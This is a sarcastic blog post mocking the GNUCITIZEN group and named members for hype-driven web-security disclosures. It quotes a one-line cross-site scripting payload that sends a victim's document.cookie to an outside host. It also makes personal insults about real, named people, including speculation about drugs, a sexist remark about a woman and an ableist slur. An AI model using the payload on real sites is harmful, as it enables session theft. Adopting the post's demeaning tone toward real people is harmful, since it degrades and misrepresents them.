That annoying GNUCITIZEN

It seems that there's a craze about applications being Javascript-enabled. It's a seriously insecure blackhole, dood! Between Bangbus spam on full-disclosure, Youtube pedophiles and other friendly inhabitants of the security community, we find Petko D. Petkov, also known as pdp, also known as GNUCITIZEN, web slayer and über underground hacker, known for the disclosure of repetitive web-related security advisories. Yack yack, the roof is on fire!

Not long ago, he came up with a pretty good timing for his new, re-designed and all-round 'bad boy looking' website, reborn as a (quoting literally):

GNUCITIZEN is a creative hacker organization. (...) So who is part of the group? The GNUCITIZEN group has some quite unique talents on board. We constantly expand our core team through a well though screening process.

We thought for first time that they were some sort of shady organization, right after reading the paragraph on screening. It was like, water-boarding training! How much water can you pull out of your lungs? Approved. Obviously this malign view went away after staring at the pictures for just a moment.

So, what's up with the GNUCITIZEN?

1. It gets annoying to read his apocalyptic Engrish. There's no single text from this young man that doesn't make you think something is seriously ticking inside someone else's head. It might be drugs, it might be some serious attention seeking disorder, or it might be BLACK PUBLIC RELATIONS (panic ensues at this point, take your shotgun).
2. The overly repetitive pattern of the work: while they pretend to be an active group with a handful different work areas, there's nothing but web security crap there. Not even the kind of issues that get your Wordpress blog credentials popped out. No, it's just a few different synonyms of Cross Site Scripting. Also known as the 'alert window denial of service' vulnerability class:
1. alert('Oh gnoes, cookie:' + document.cookie);
2. document.location('http://oh.gnoes.ru/cookie.php?' + document.cookie);
3. Don't forget local network port scanning, DANGER WILL ROBINSON!
   
3. The presence of a Public Relations consultant (whatever that means), who happens to be Petkov's polski speaking chick!:

Ivana Kalay is a leading Public Relations security (PRS) expert. She specializes in competitive intelligence, social engineering and Black PR. Ivana is also an active member of GNUCITIZEN group and founder of Spin Hunters, the first PRS company in United Kingdom.

Note that our friendly UK lobbyists have a law that basically makes all-things-hacking a bad thing! Maybe they will report themselves to Scotland Yard after reading this, and make us all a favor.

But please, stop the craze of non-sense security. Web security is important. Making a name for yourself just for fame and buzz, is something nobody cares about. The so-called partial disclosure is just part of this madness. Security is simple: you either talk about it, or shut the f*ck up and keep it for yourself. Bragging is really retarded.